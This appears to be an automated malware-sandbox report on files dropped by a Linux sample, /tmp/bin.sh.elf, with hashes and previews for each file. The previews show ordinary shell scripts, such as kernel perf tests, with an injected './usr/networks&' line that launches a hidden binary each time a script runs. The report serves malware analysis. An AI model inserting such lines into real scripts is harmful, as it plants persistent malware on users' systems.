                                                                  Entropy (8bit):5.063685234698662
                                                                  Encrypted:false
                                                                  SSDEEP:24:dgag2s0vRocEeuc5nf4OIypA4KdAqhzAytRozqC:dd33vycJ4pMA4KtftgX
                                                                  MD5:126EA193A782B859133B7D175B89C795
                                                                  SHA1:EA89D10F53E9DF9685D03131034C301E11D78617
                                                                  SHA-256:32159BD7A2F4959C901796F6FE54CDBB7BDEA02FE819FC7887F0D29EA4243DD2
                                                                  SHA-512:799E9C2778F6C305446356002EC17B4E2F13A41D81F10680A86C30D02F81675CD6F331916AC56C376C9AAFFEB7FC0904D7FDABAD4DF0A682BC6BA1020920410E
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.skip_if_no_perf_probe || exit 2... $(dirname $0)/lib/probe_vfs_getname.sh..perfdata=$(mktemp /tmp/__perf_test.perf.data.XXXXX).file=$(mktemp /tmp/temporary_file.XXXXX)..record_open_file() {..echo "Recording open file:"..perf record -o ${perfdata} -e probe:vfs_getname touch $file.}..perf_script_filenames() {..echo "Looking at perf.data file for vfs_getname records for the file we touched:"..perf script -i ${perfdata} | \..egrep " +touch +[0-9]+ +\[[0-9]+\] +[0-9]+\.[0-9]+: +probe:vfs_getname: +\([[:xdigit:]]+\) +pathname=\"${file}\"".}..add_probe_vfs_getname || skip_if_no_debuginfo.err=$?.if [ $err -ne 0 ] ; then..exit $err.fi..record_open_file && perf_script_filenames.err=$?.rm -f ${perfdata}.rm -f ${file}.cleanup_probe_vfs_getname.exit $err../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):175
                                                                  Entropy (8bit):4.56987105178125
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVYUgL2RjZFtvGSp1QGKR5D8NA7VDiCfx7VD4EyXDlRXYvZOj2HvqlOORgn:cjZrpCr5D8NARDP5RD4EyX3sZ7PTn
                                                                  MD5:C18BE941AC8872252385A118389DBE1F
                                                                  SHA1:EF0F9A60B8E3BDCD9D135BEBC6E6FB0B40C1DC56
                                                                  SHA-256:84C02426161EEC74AED2847DA06C62CD8EA87DCF6ECCE2FAD0C919242F168AAD
                                                                  SHA-512:DCFF993D3B448E3E1AECAD9A38B7853FD6C78C69D1B216CBE3F2E383C66A74C71D878EA71C503DDCB620829FD794B16FECF80FD1C77E6D56B3CE3EC675CF7C55
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.skip_if_no_z_record || exit 2.collect_z_record && check_compressed_stats && check_compressed_output.err=$?.rm -f $trace_file*.exit $err../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):903
                                                                  Entropy (8bit):5.457774373928952
                                                                  Encrypted:false
                                                                  SSDEEP:24:GgZK+BJ4tKIgz4zA6AqhzD3OQYcR+r4oC:G80t2aAq5eQvR+M
                                                                  MD5:F67D88D746E8684039F80038F291B901
                                                                  SHA1:3FB52B248C2B563875C193D50FF579B01E881850
                                                                  SHA-256:335A6AB099307E5702CC4592F17C0FBED43CC1078E84C0FE5DD75A571E5D0962
                                                                  SHA-512:9941B3E08190D1C6BE060A81B45311D149586265083FB5D5FBB2E397CD3B6B0E81CFD42139B923F3777AD1CBDC9AE7046B8DA25DFC97DFFA58F18BB64AA61285
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.skip_if_no_perf_probe || exit 2.skip_if_no_perf_trace || exit 2... $(dirname $0)/lib/probe_vfs_getname.sh..file=$(mktemp /tmp/temporary_file.XXXXX)..trace_open_vfs_getname() {..evts=$(echo $(perf list syscalls:sys_enter_open* 2>&1 | egrep 'open(at)? ' | sed -r 's/.*sys_enter_([a-z]+) +\[.*$/\1/') | sed 's/ /,/')..perf trace -e $evts touch $file 2>&1 | \..egrep " +[0-9]+\.[0-9]+ +\( +[0-9]+\.[0-9]+ ms\): +touch\/[0-9]+ open(at)?\((dfd: +CWD, +)?filename: +${file}, +flags: CREAT\|NOCTTY\|NONBLOCK\|WRONLY, +mode: +IRUGO\|IWUGO\) += +[0-9]+$".}...add_probe_vfs_getname || skip_if_no_debuginfo.err=$?.if [ $err -ne 0 ] ; then..exit $err.fi..# Do not use whatever ~/.perfconfig file, it may change the output.# via trace.{show_timestamp,show_prefix,etc}.export PERF_CONFIG=/dev/null..trace_open_vfs_getname.err=$?.rm -f ${file}.cleanup_probe_vfs_getname.exit $err../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1945
                                                                  Entropy (8bit):4.979286071491067
                                                                  Encrypted:false
                                                                  SSDEEP:48:RWm+vzox5sLz6EYxhP1zNhxhfB3c2wSLOy62xC:RZ+EN9BsYC
                                                                  MD5:48B0FCC1C0DC28CF6C49038349B2052A
                                                                  SHA1:EC84B8956F1DDC8FDE4340B54B1C372F8336BBBF
                                                                  SHA-256:3C68383030083C47A9841D41A6FE581CB5E302971838E773AAB6F7CF6676C763
                                                                  SHA-512:46BCE1A60F89D5A2227A63BD13E12E37A1AB5D98F80DCFE2990DADB34DA8AC6637B777E089E6E3DF703CD5FF45BAC39B0F28289D922CBF2958850D8BBB390388
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 1.}..if [ $# -eq 0 ];then..echo "No benchmark results file provided"..echo..usage.fi..while getopts o:t:p: name ; do. case $name in..o).. output_file="$OPTARG".$picture_type.. ;;..t).. global_title="$OPTARG".. ;;..p).. picture_type="$OPTARG".. ;;. ?).. usage.. ;;. esac.done.shift $(($OPTIND -1))..plots=0.while [ "$1" ];do. if [ ! -f "$1" ];then..echo "File $1 does not exist"..usage. fi. file[$plots]="$1". title[$plots]="$2". # echo "File: ${file[$plots]} - ${title[plots]}". shift;shift. plots=$((plots + 1)).done..echo "set terminal $picture_type".>> $dir/plot_script.gpl.echo "set output \"$output_file\"".>> $dir/plot_script.gpl.echo "set title \"$global_title\"".>> $dir/plot_script.gpl.echo "set xlabel \"sleep/load time\"".>> $dir/plot_script.gpl.echo "set ylabel \"Performance (%)\"".>> $dir/plot_script.gpl..for((plot=0;plot<$plots;plot++));do.. # Sanity check. ###### I am to dump to get this redir
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):604
                                                                  Entropy (8bit):5.561154174414677
                                                                  Encrypted:false
                                                                  SSDEEP:12:XrBIJk/GnbR1LN0EA055gVA05b8A05hfEA0uVLGOfj14n:7BIJk/wbREEN5ONANhfEScOfjy
                                                                  MD5:9D2CE9B921B8F8B5C1EBFE4286555C72
                                                                  SHA1:99A3182EA8A51A67CBC111A5B3A99AFE64912BBE
                                                                  SHA-256:8D91B2E3D2D4D960A1F9AD0520E75896F8BCA7D6FFED6BE756C04FC642713CF5
                                                                  SHA-512:BE5B1134C9487E143DD1D95FA58764EB1C9F072B9DB2950DC8B9D8B40CEABC071BE623FC43E5F9DABE61C2A181A8FE6B73AC7269CAE4A026BBC977F863CC428C
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..*$LF*) (exit 1) ;;..v[0-9]*)...git update-index -q --refresh...test -z "$(git diff-index --name-only HEAD --)" ||...VN="$VN-dirty" ;;..esac.then..VN=$(echo "$VN" | sed -e 's/-/./g');.else..eval $(grep '^VERSION[[:space:]]*=' ../../../Makefile|tr -d ' ')..eval $(grep '^PATCHLEVEL[[:space:]]*=' ../../../Makefile|tr -d ' ')..eval $(grep '^SUBLEVEL[[:space:]]*=' ../../../Makefile|tr -d ' ')..eval $(grep '^EXTRAVERSION[[:space:]]*=' ../../../Makefile|tr -d ' ')...VN="${VERSION}.${PATCHLEVEL}.${SUBLEVEL}${EXTRAVERSION}".fi..VN=$(expr "$VN" : v*'\(.*\)')..echo $VN../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3546
                                                                  Entropy (8bit):5.39875675800216
                                                                  Encrypted:false
                                                                  SSDEEP:48:+ompInFo6hycZe5pJcycfKkIfIJey5rmwxNlxtxgy/mLXFVxRx0F+xeJ3x0U2oxX:LmmVycfJ+6q2IyuTFQ1KU2AHVEm
                                                                  MD5:9175A020A49687C9C3769B4E3ECF52BB
                                                                  SHA1:744CC9432C843375F236C065D2CCA76275E70748
                                                                  SHA-256:B00FF74B7D297A53347F375E626532D14655592F175589276F394F15781715C3
                                                                  SHA-512:A30C2A72C46748F4052250093FCE5BC75817A75363DA4CB3E06ABAA4BA0C831151E65FD98F3F94168828719CC4D55625897ADCC3DEE571ED156AA459A066A916
                                                                  Malicious:false
